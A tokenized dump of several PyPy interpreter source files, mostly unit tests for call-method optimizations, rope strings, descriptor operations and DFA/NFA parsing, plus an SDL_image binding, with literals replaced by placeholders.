miniglobals , entry . fallback <EOL> def build_funcentry ( self , funcnameparts , calllist , ** extranames ) : <EOL> def expr ( v ) : <EOL> if isinstance ( v , Call ) : <EOL> return '<STR_LIT>' % ( invent_name ( miniglobals , v . function ) , <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ expr ( w ) for w in v . arguments ] ) ) <EOL> else : <EOL> return v <EOL> fallback = len ( calllist ) == <NUM_LIT:0> <EOL> if fallback : <EOL> miniglobals = { '<STR_LIT>' : raiseFailedToImplement } <EOL> bodylines = [ '<STR_LIT>' ] <EOL> else : <EOL> miniglobals = { '<STR_LIT>' : FailedToImplement } <EOL> miniglobals . update ( extranames ) <EOL> bodylines = [ ] <EOL> for v in calllist [ : - <NUM_LIT:1> ] : <EOL> bodylines . append ( '<STR_LIT>' ) <EOL> bodylines . append ( '<STR_LIT>' % expr ( v ) ) <EOL> bodylines . append ( '<STR_LIT>' ) <EOL> bodylines . append ( '<STR_LIT>' ) <EOL> bodylines . append ( '<STR_LIT>' % expr ( calllist [ - <NUM_LIT:1> ] ) ) <EOL> miniglobals [ '<STR_LIT>' ] = __name__ <EOL> entry = FuncEntry ( bodylines , miniglobals , fallback ) <EOL> key = entry . key ( ) <EOL> try : <EOL> entry = self . mmfunccache [ key ] <EOL> except KeyError : <EOL> self . mmfunccache [ key ] = entry <EOL> entry . possiblenames . append ( funcnameparts ) <EOL> return entry <EOL> Installer = InstallerVersion1 </s>
<s> import py <EOL> from pypy . conftest import gettestobjspace <EOL> class AppTestCallMethod : <EOL> OPTIONS = { "<STR_LIT>" : True } <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** cls . OPTIONS ) <EOL> def test_call_method ( self ) : <EOL> exec """<STR_LIT>""" <EOL> def test_call_attribute ( self ) : <EOL> exec """<STR_LIT>""" <EOL> def test_call_module ( self ) : <EOL> exec """<STR_LIT>""" <EOL> def test_custom_getattr ( self ) : <EOL> exec """<STR_LIT>""" in { } <EOL> def test_custom_getattribute ( self ) : <EOL> exec """<STR_LIT>""" in { } <EOL> def test_builtin ( self ) : <EOL> exec """<STR_LIT>""" <EOL> def test_attributeerror ( self ) : <EOL> exec """<STR_LIT>""" <EOL> class AppTestCallMethodWithGetattributeShortcut ( AppTestCallMethod ) : <EOL> OPTIONS = AppTestCallMethod . OPTIONS . copy ( ) <EOL> OPTIONS [ "<STR_LIT>" ] = True <EOL> class TestCallMethod : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> def test_space_call_method ( self ) : <EOL> space = self . space <EOL> w_lst = space . newlist ( [ ] ) <EOL> space . call_method ( w_lst , '<STR_LIT>' , space . w_False ) <EOL> res = space . int_w ( space . call_method ( w_lst , '<STR_LIT>' ) ) <EOL> assert res == <NUM_LIT:1> <EOL> def test_fallback_case ( self ) : <EOL> space = self . space <EOL> space . int_w ( space . call_method ( space . wrap ( space . sys ) , <EOL> '<STR_LIT>' ) ) <EOL> def test_optimizations_enabled ( self ) : <EOL> from pypy . objspace . std import callmethod <EOL> assert ( self . space . FrameClass . LOOKUP_METHOD . im_func == <EOL> callmethod . LOOKUP_METHOD ) <EOL> assert ( self . space . FrameClass . CALL_METHOD . im_func == <EOL> callmethod . CALL_METHOD ) </s>
<s> import py <EOL> from pypy . objspace . std . test import test_stringobject , test_unicodeobject <EOL> from pypy . conftest import gettestobjspace <EOL> class TestRopeUnicodeObject ( test_unicodeobject . TestUnicodeObject ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> class AppTestRopeObject ( test_stringobject . AppTestStringObject ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> def test_hash ( self ) : <EOL> pass <EOL> def test_replace_buffer ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> class AppTestRopeUnicode ( object ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> def test_replace_buffer ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> class AppTestUnicodeRopeStdOnly ( test_unicodeobject . AppTestUnicodeStringStdOnly ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> class AppTestUnicodeRope ( test_unicodeobject . AppTestUnicodeString ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( usemodules = ( '<STR_LIT>' , ) , <EOL> ** { "<STR_LIT>" : True } ) <EOL> def test_replace_buffer ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> def test_replace_with_buffer ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> def test_rfind_corner_case ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> def test_rsplit ( self ) : <EOL> skip ( "<STR_LIT>" ) </s>
<s> class Test_DescrOperation : <EOL> def test_nonzero ( self ) : <EOL> space = self . space <EOL> assert space . nonzero ( space . w_True ) is space . w_True <EOL> assert space . nonzero ( space . w_False ) is space . w_False <EOL> assert space . nonzero ( space . wrap ( <NUM_LIT> ) ) is space . w_True <EOL> assert space . nonzero ( space . wrap ( <NUM_LIT:0> ) ) is space . w_False <EOL> l = space . newlist ( [ ] ) <EOL> assert space . nonzero ( l ) is space . w_False <EOL> space . call_method ( l , '<STR_LIT>' , space . w_False ) <EOL> assert space . nonzero ( l ) is space . w_True <EOL> class AppTest_Descroperation : <EOL> OPTIONS = { } <EOL> def setup_class ( cls ) : <EOL> from pypy import conftest <EOL> cls . space = conftest . gettestobjspace ( ** cls . OPTIONS ) <EOL> def test_special_methods ( self ) : <EOL> class A ( object ) : <EOL> def __lt__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __imul__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __sub__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __rsub__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __pow__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __rpow__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __neg__ ( self ) : <EOL> return "<STR_LIT>" <EOL> a = A ( ) <EOL> assert ( a < <NUM_LIT:5> ) == "<STR_LIT>" <EOL> assert ( object ( ) > a ) == "<STR_LIT>" <EOL> a1 = a <EOL> a1 *= <NUM_LIT:4> <EOL> assert a1 == "<STR_LIT>" <EOL> assert a - <NUM_LIT:2> == "<STR_LIT>" <EOL> assert a - object ( ) == "<STR_LIT>" <EOL> assert <NUM_LIT:2> - a == "<STR_LIT>" <EOL> assert object ( ) - a == "<STR_LIT>" <EOL> assert a ** <NUM_LIT:2> == "<STR_LIT>" <EOL> assert a ** object ( ) == "<STR_LIT>" <EOL> assert <NUM_LIT:2> ** a == "<STR_LIT>" <EOL> assert object ( ) ** a == "<STR_LIT>" <EOL> assert - a == "<STR_LIT>" <EOL> class B ( A ) : <EOL> def __lt__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __imul__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def 
__sub__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __rsub__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __pow__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __rpow__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __neg__ ( self ) : <EOL> return "<STR_LIT>" <EOL> b = B ( ) <EOL> assert ( a < b ) == "<STR_LIT>" <EOL> assert ( b > a ) == "<STR_LIT>" <EOL> b1 = b <EOL> b1 *= a <EOL> assert b1 == "<STR_LIT>" <EOL> a1 = a <EOL> a1 *= b <EOL> assert a1 == "<STR_LIT>" <EOL> assert a - b == "<STR_LIT>" <EOL> assert b - a == "<STR_LIT>" <EOL> assert b - b == "<STR_LIT>" <EOL> assert a ** b == "<STR_LIT>" <EOL> assert b ** a == "<STR_LIT>" <EOL> assert b ** b == "<STR_LIT>" <EOL> assert - b == "<STR_LIT>" <EOL> class C ( B ) : <EOL> pass <EOL> c = C ( ) <EOL> assert c - <NUM_LIT:1> == "<STR_LIT>" <EOL> assert <NUM_LIT:1> - c == "<STR_LIT>" <EOL> assert c - b == "<STR_LIT>" <EOL> assert b - c == "<STR_LIT>" <EOL> assert c ** <NUM_LIT:1> == "<STR_LIT>" <EOL> assert <NUM_LIT:1> ** c == "<STR_LIT>" <EOL> assert c ** b == "<STR_LIT>" <EOL> assert b ** c == "<STR_LIT>" <EOL> def test_getslice ( self ) : <EOL> class Sq ( object ) : <EOL> def __getslice__ ( self , start , stop ) : <EOL> return ( start , stop ) <EOL> def __getitem__ ( self , key ) : <EOL> return "<STR_LIT>" <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:100> <EOL> sq = Sq ( ) <EOL> assert sq [ <NUM_LIT:1> : <NUM_LIT:3> ] == ( <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> slice_min , slice_max = sq [ : ] <EOL> assert slice_min == <NUM_LIT:0> <EOL> assert slice_max >= <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:1> <EOL> assert sq [ <NUM_LIT:1> : ] == ( <NUM_LIT:1> , slice_max ) <EOL> assert sq [ : <NUM_LIT:3> ] == ( <NUM_LIT:0> , <NUM_LIT:3> ) <EOL> assert sq [ : ] == ( <NUM_LIT:0> , slice_max ) <EOL> assert sq [ - <NUM_LIT:1> : <NUM_LIT:3> ] == ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert sq [ <NUM_LIT:1> : - <NUM_LIT:3> ] == ( <NUM_LIT:1> , <NUM_LIT> ) <EOL> assert sq [ - <NUM_LIT:1> : - <NUM_LIT:3> ] 
== ( <NUM_LIT> , <NUM_LIT> ) <EOL> assert sq [ : : ] == "<STR_LIT>" <EOL> def test_setslice ( self ) : <EOL> class Sq ( object ) : <EOL> def __setslice__ ( self , start , stop , sequence ) : <EOL> ops . append ( ( start , stop , sequence ) ) <EOL> def __setitem__ ( self , key , value ) : <EOL> raise AssertionError , key <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:100> <EOL> sq = Sq ( ) <EOL> ops = [ ] <EOL> sq [ - <NUM_LIT:5> : <NUM_LIT:3> ] = '<STR_LIT:hello>' <EOL> sq [ <NUM_LIT:12> : ] = '<STR_LIT>' <EOL> sq [ : - <NUM_LIT:1> ] = '<STR_LIT>' <EOL> sq [ : ] = '<STR_LIT>' <EOL> slice_max = ops [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> assert slice_max >= <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:1> <EOL> assert ops == [ <EOL> ( <NUM_LIT> , <NUM_LIT:3> , '<STR_LIT:hello>' ) , <EOL> ( <NUM_LIT:12> , slice_max , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:0> , slice_max , '<STR_LIT>' ) , <EOL> ] <EOL> def test_delslice ( self ) : <EOL> class Sq ( object ) : <EOL> def __delslice__ ( self , start , stop ) : <EOL> ops . 
append ( ( start , stop ) ) <EOL> def __delitem__ ( self , key ) : <EOL> raise AssertionError , key <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:100> <EOL> sq = Sq ( ) <EOL> ops = [ ] <EOL> del sq [ <NUM_LIT:5> : - <NUM_LIT:3> ] <EOL> del sq [ - <NUM_LIT:12> : ] <EOL> del sq [ : <NUM_LIT:1> ] <EOL> del sq [ : ] <EOL> slice_max = ops [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> assert slice_max >= <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:1> <EOL> assert ops == [ <EOL> ( <NUM_LIT:5> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , slice_max ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:0> , slice_max ) , <EOL> ] <EOL> def test_ipow ( self ) : <EOL> x = <NUM_LIT:2> <EOL> x **= <NUM_LIT:5> <EOL> assert x == <NUM_LIT:32> <EOL> def test_typechecks ( self ) : <EOL> class myint ( int ) : <EOL> pass <EOL> class X ( object ) : <EOL> def __nonzero__ ( self ) : <EOL> return myint ( <NUM_LIT:1> ) <EOL> raises ( TypeError , "<STR_LIT>" ) <EOL> def test_string_subclass ( self ) : <EOL> class S ( str ) : <EOL> def __hash__ ( self ) : <EOL> return <NUM_LIT> <EOL> s = S ( "<STR_LIT:abc>" ) <EOL> setattr ( s , s , s ) <EOL> assert len ( s . 
__dict__ ) == <NUM_LIT:1> <EOL> assert getattr ( s , s ) is s <EOL> def test_notimplemented ( self ) : <EOL> import operator <EOL> def specialmethod ( self , other ) : <EOL> return NotImplemented <EOL> def check ( expr , x , y , operator = operator ) : <EOL> raises ( TypeError , expr ) <EOL> for metaclass in [ type ] : <EOL> for name , expr , iexpr in [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None ) ] : <EOL> if name == '<STR_LIT>' : <EOL> rname = name <EOL> else : <EOL> rname = '<STR_LIT>' + name [ <NUM_LIT:2> : ] <EOL> A = metaclass ( '<STR_LIT:A>' , ( ) , { name : specialmethod } ) <EOL> B = metaclass ( '<STR_LIT:B>' , ( ) , { rname : specialmethod } ) <EOL> a = A ( ) <EOL> b = B ( ) <EOL> check ( expr , a , a ) <EOL> check ( expr , a , b ) <EOL> check ( expr , b , a ) <EOL> check ( expr , b , b ) <EOL> check ( expr , a , <NUM_LIT:5> ) <EOL> check ( expr , <NUM_LIT:5> , b ) <EOL> if iexpr : <EOL> check ( iexpr , a , a ) <EOL> check ( iexpr , a , b ) <EOL> check ( iexpr , b , a ) <EOL> check ( iexpr , b , b ) <EOL> check ( iexpr , a , <NUM_LIT:5> ) <EOL> iname = '<STR_LIT>' + name [ <NUM_LIT:2> : ] <EOL> C = metaclass ( '<STR_LIT:C>' , ( ) , { iname : specialmethod } ) <EOL> c = C ( ) <EOL> check ( iexpr , c , a ) <EOL> check ( iexpr , c , b ) <EOL> check ( iexpr , c , 
<NUM_LIT:5> ) <EOL> def test_string_results ( self ) : <EOL> class A ( object ) : <EOL> def __str__ ( self ) : <EOL> return answer * <NUM_LIT:2> <EOL> def __repr__ ( self ) : <EOL> return answer * <NUM_LIT:3> <EOL> def __hex__ ( self ) : <EOL> return answer * <NUM_LIT:4> <EOL> def __oct__ ( self ) : <EOL> return answer * <NUM_LIT:5> <EOL> for operate , n in [ ( str , <NUM_LIT:2> ) , ( repr , <NUM_LIT:3> ) , ( hex , <NUM_LIT:4> ) , ( oct , <NUM_LIT:5> ) ] : <EOL> answer = "<STR_LIT:hello>" <EOL> assert operate ( A ( ) ) == "<STR_LIT:hello>" * n <EOL> if operate not in ( hex , oct ) : <EOL> answer = u"<STR_LIT>" <EOL> assert operate ( A ( ) ) == "<STR_LIT>" * n <EOL> assert type ( operate ( A ( ) ) ) is str <EOL> answer = <NUM_LIT> <EOL> raises ( TypeError , operate , A ( ) ) <EOL> def test_missing_getattribute ( self ) : <EOL> class X ( object ) : pass <EOL> class Y ( X ) : <EOL> class __metaclass__ ( type ) : <EOL> def mro ( cls ) : <EOL> return [ cls , X ] <EOL> x = X ( ) <EOL> x . __class__ = Y <EOL> raises ( AttributeError , getattr , x , '<STR_LIT:a>' ) <EOL> def test_silly_but_consistent_order ( self ) : <EOL> class A ( object ) : pass <EOL> class zz ( object ) : pass <EOL> assert A ( ) < zz ( ) <EOL> assert zz ( ) > A ( ) <EOL> assert <NUM_LIT:0> < ( ) <EOL> assert <NUM_LIT:0> L < ( ) <EOL> assert <NUM_LIT:0.0> < ( ) <EOL> assert <NUM_LIT> < ( ) <EOL> assert <NUM_LIT:0> < [ ] <EOL> assert <NUM_LIT:0> L < [ ] <EOL> assert <NUM_LIT:0.0> < [ ] <EOL> assert <NUM_LIT> < [ ] <EOL> assert <NUM_LIT:0> < A ( ) <EOL> assert <NUM_LIT:0> L < A ( ) <EOL> assert <NUM_LIT:0.0> < A ( ) <EOL> assert <NUM_LIT> < A ( ) <EOL> assert <NUM_LIT:0> < zz ( ) <EOL> assert <NUM_LIT:0> L < zz ( ) <EOL> assert <NUM_LIT:0.0> < zz ( ) <EOL> assert <NUM_LIT> < zz ( ) <EOL> a1 = A ( ) <EOL> a2 = A ( ) <EOL> class A ( object ) : pass <EOL> a3 = A ( ) <EOL> a4 = A ( ) <EOL> assert ( a1 < a3 ) == ( a1 < a4 ) == ( a2 < a3 ) == ( a2 < a4 ) <EOL> def test_setattrweakref ( self ) : <EOL> skip ( 
"<STR_LIT>" ) <EOL> class P ( object ) : <EOL> pass <EOL> setattr ( P , "<STR_LIT>" , <NUM_LIT:0> ) <EOL> def test_subclass_comparison ( self ) : <EOL> l = [ ] <EOL> class A ( object ) : <EOL> def __eq__ ( self , other ) : <EOL> l . append ( self . __class__ ) <EOL> l . append ( other . __class__ ) <EOL> return False <EOL> def __lt__ ( self , other ) : <EOL> l . append ( self . __class__ ) <EOL> l . append ( other . __class__ ) <EOL> return False <EOL> class B ( A ) : <EOL> pass <EOL> A ( ) == B ( ) <EOL> A ( ) < B ( ) <EOL> assert l == [ B , A , A , B ] <EOL> class AppTestWithBuiltinShortcut ( AppTest_Descroperation ) : <EOL> OPTIONS = { '<STR_LIT>' : True } </s>
<s> from pypy . rlib . parsing . deterministic import * <EOL> from sets import Set <EOL> def test_DFA_simple ( ) : <EOL> a = DFA ( ) <EOL> s0 = a . add_state ( "<STR_LIT:start>" ) <EOL> s1 = a . add_state ( ) <EOL> s2 = a . add_state ( final = True ) <EOL> a [ s0 , "<STR_LIT:a>" ] = s0 <EOL> a [ s0 , "<STR_LIT:c>" ] = s1 <EOL> a [ s0 , "<STR_LIT:b>" ] = s2 <EOL> a [ s1 , "<STR_LIT:b>" ] = s2 <EOL> r = DFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT:b>" ) <EOL> assert not r . recognize ( "<STR_LIT:a>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> recognize = a . make_code ( ) <EOL> assert recognize ( "<STR_LIT>" ) <EOL> assert recognize ( "<STR_LIT:b>" ) <EOL> assert py . test . raises ( LexerError , "<STR_LIT>" ) <EOL> assert py . test . raises ( LexerError , "<STR_LIT>" ) <EOL> assert recognize ( "<STR_LIT>" ) <EOL> def test_compile_recognizer ( ) : <EOL> try : <EOL> from pypy . translator . interactive import Translation <EOL> except ImportError : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> a = DFA ( ) <EOL> s0 = a . add_state ( "<STR_LIT:start>" ) <EOL> s1 = a . add_state ( ) <EOL> s2 = a . add_state ( final = True ) <EOL> a [ s0 , "<STR_LIT:a>" ] = s0 <EOL> a [ s0 , "<STR_LIT:c>" ] = s1 <EOL> a [ s0 , "<STR_LIT:b>" ] = s2 <EOL> a [ s1 , "<STR_LIT:b>" ] = s2 <EOL> recognize = a . make_code ( ) <EOL> t = Translation ( recognize ) <EOL> t . backendopt ( [ str ] , backend = "<STR_LIT:c>" ) <EOL> cfn = t . compile_c ( ) <EOL> assert cfn ( "<STR_LIT>" ) <EOL> assert cfn ( "<STR_LIT:b>" ) <EOL> assert cfn ( "<STR_LIT>" ) <EOL> def test_NFA_simple ( ) : <EOL> a = NFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z1 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z2 = a . add_state ( "<STR_LIT>" , final = True ) <EOL> a . add_transition ( z0 , z0 , "<STR_LIT:0>" ) <EOL> a . add_transition ( z0 , z1 , "<STR_LIT:0>" ) <EOL> a . 
add_transition ( z0 , z0 , "<STR_LIT:1>" ) <EOL> a . add_transition ( z1 , z2 , "<STR_LIT:0>" ) <EOL> r = SetNFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT:100>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> r = BacktrackingNFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT:100>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> def test_NFA_with_epsilon ( ) : <EOL> a = NFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z1 = a . add_state ( "<STR_LIT>" ) <EOL> z2 = a . add_state ( "<STR_LIT>" , final = True ) <EOL> a . add_transition ( z0 , z1 ) <EOL> a . add_transition ( z0 , z1 , "<STR_LIT:a>" ) <EOL> a . add_transition ( z1 , z2 , "<STR_LIT:b>" ) <EOL> r = SetNFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT:b>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> r = BacktrackingNFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT:b>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> fda = a . make_deterministic ( ) <EOL> r = fda . get_runner ( ) <EOL> def test_NFA_to_DFA_simple ( ) : <EOL> a = NFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z1 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z2 = a . add_state ( "<STR_LIT>" , final = True ) <EOL> a . add_transition ( z0 , z0 , "<STR_LIT:0>" ) <EOL> a . add_transition ( z0 , z1 , "<STR_LIT:0>" ) <EOL> a . add_transition ( z0 , z0 , "<STR_LIT:1>" ) <EOL> a . 
add_transition ( z1 , z2 , "<STR_LIT:0>" ) <EOL> fda = a . make_deterministic ( ) <EOL> r = DFARunner ( fda ) <EOL> assert r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT:100>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> def test_simplify ( ) : <EOL> a = DFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" ) <EOL> z1 = a . add_state ( "<STR_LIT>" ) <EOL> z2 = a . add_state ( "<STR_LIT>" ) <EOL> z3 = a . add_state ( "<STR_LIT>" ) <EOL> z4 = a . add_state ( "<STR_LIT>" , final = True ) <EOL> a [ z0 , "<STR_LIT:1>" ] = z2 <EOL> a [ z0 , "<STR_LIT:0>" ] = z1 <EOL> a [ z1 , "<STR_LIT:1>" ] = z2 <EOL> a [ z1 , "<STR_LIT:0>" ] = z4 <EOL> a [ z2 , "<STR_LIT:1>" ] = z2 <EOL> a [ z2 , "<STR_LIT:0>" ] = z3 <EOL> a [ z3 , "<STR_LIT:0>" ] = z4 <EOL> a [ z3 , "<STR_LIT:1>" ] = z0 <EOL> a [ z4 , "<STR_LIT:0>" ] = z4 <EOL> a [ z4 , "<STR_LIT:1>" ] = z4 <EOL> a . optimize ( ) <EOL> r = a . get_runner ( ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> newa = eval ( repr ( a ) ) <EOL> r = newa . get_runner ( ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> def test_something ( ) : <EOL> a = NFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" , start = True , final = True ) <EOL> z1 = a . add_state ( "<STR_LIT>" ) <EOL> z2 = a . add_state ( "<STR_LIT>" , start = True , final = True ) <EOL> a . add_transition ( z0 , z1 , "<STR_LIT:a>" ) <EOL> a . add_transition ( z1 , z0 , "<STR_LIT:b>" ) <EOL> a . 
add_transition ( z1 , z1 , "<STR_LIT:a>" ) <EOL> a . add_transition ( z1 , z1 , "<STR_LIT:b>" ) <EOL> a . add_transition ( z1 , z2 , "<STR_LIT:a>" ) <EOL> fda = a . make_deterministic ( ) <EOL> def test_compress_char_set ( ) : <EOL> import string <EOL> assert compress_char_set ( "<STR_LIT>" ) == [ ( '<STR_LIT:a>' , <NUM_LIT:1> ) , ( '<STR_LIT:c>' , <NUM_LIT:1> ) , ( '<STR_LIT:e>' , <NUM_LIT:1> ) ] <EOL> assert compress_char_set ( "<STR_LIT>" ) == [ ( '<STR_LIT:a>' , <NUM_LIT:7> ) ] <EOL> assert compress_char_set ( "<STR_LIT>" ) == [ ( '<STR_LIT:A>' , <NUM_LIT:3> ) , ( '<STR_LIT:a>' , <NUM_LIT:3> ) ] <EOL> assert compress_char_set ( "<STR_LIT>" ) == [ ( '<STR_LIT:a>' , <NUM_LIT:3> ) , ( '<STR_LIT:y>' , <NUM_LIT:2> ) ] <EOL> assert compress_char_set ( string . ascii_letters ) == [ ( '<STR_LIT:A>' , <NUM_LIT> ) , ( '<STR_LIT:a>' , <NUM_LIT> ) ] <EOL> assert compress_char_set ( string . printable ) == [ ( '<STR_LIT:U+0020>' , <NUM_LIT> ) , ( '<STR_LIT:\t>' , <NUM_LIT:5> ) ] <EOL> def test_make_nice_charset_repr ( ) : <EOL> import string <EOL> assert make_nice_charset_repr ( "<STR_LIT>" ) == '<STR_LIT>' <EOL> assert make_nice_charset_repr ( "<STR_LIT>" ) == '<STR_LIT>' <EOL> assert make_nice_charset_repr ( "<STR_LIT>" ) == '<STR_LIT>' <EOL> assert make_nice_charset_repr ( "<STR_LIT>" ) == '<STR_LIT>' <EOL> assert make_nice_charset_repr ( string . ascii_letters ) == '<STR_LIT>' <EOL> nice = make_nice_charset_repr ( string . printable ) <EOL> chunks = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> chunks += list ( '<STR_LIT>' ) <EOL> for chunk in chunks : <EOL> assert chunk in nice <EOL> assert len ( '<STR_LIT>' . join ( chunks ) ) == len ( nice ) </s>
<s> import sys <EOL> from pypy . rpython . lltypesystem import lltype , rffi <EOL> from pypy . rpython . tool import rffi_platform as platform <EOL> from pypy . translator . tool . cbuild import ExternalCompilationInfo <EOL> from pypy . rlib . rsdl import RSDL <EOL> if sys . platform == '<STR_LIT>' : <EOL> eci = ExternalCompilationInfo ( <EOL> includes = [ '<STR_LIT>' ] , <EOL> frameworks = [ '<STR_LIT>' ] , <EOL> include_dirs = [ '<STR_LIT>' ] <EOL> ) <EOL> else : <EOL> eci = ExternalCompilationInfo ( <EOL> includes = [ '<STR_LIT>' ] , <EOL> libraries = [ '<STR_LIT>' ] , <EOL> ) <EOL> eci = eci . merge ( RSDL . eci ) <EOL> def external ( name , args , result ) : <EOL> return rffi . llexternal ( name , args , result , compilation_info = eci ) <EOL> Load = external ( '<STR_LIT>' , [ rffi . CCHARP ] , RSDL . SurfacePtr ) </s>
